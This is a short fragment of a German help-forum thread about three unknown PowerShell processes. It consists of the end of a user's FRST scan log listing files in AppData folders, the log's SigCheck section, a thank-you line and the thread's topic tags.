2023-02-03 01:38 - 2023-02-03 01:36 - 000003603 _____ () C:\Program Files (x86)\stempel
2023-02-25 05:31 - 2023-03-24 15:22 - 000208896 _____ () C:\Users\*****\AppData\Roaming\emp.bin
2023-07-07 20:14 - 2023-07-07 20:14 - 000000907 _____ () C:\Users\*****\AppData\Roaming\jd-gui.cfg
2021-10-17 00:27 - 2023-03-13 22:29 - 000000128 _____ () C:\Users\*****\AppData\Local\PUTTY.RND
2023-10-11 23:32 - 2023-10-11 23:32 - 000000881 _____ () C:\Users\*****\AppData\Local\recently-used.xbel
2021-10-17 00:27 - 2023-07-17 16:11 - 000007619 _____ () C:\Users\*****\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
Vielen Dank. |
| Themen zu drei Unbekannte Powershell Prozesse |
| administrator, autorun, dateien, defender, explorer.exe, firefox, google, homepage, internet, microsoft, mozilla, ordner, pdf, prozess, prozesse, realtek, registry, scan, services.exe, suche, svchost.exe, system, temp, treiber, windows |
Baum-Darstellung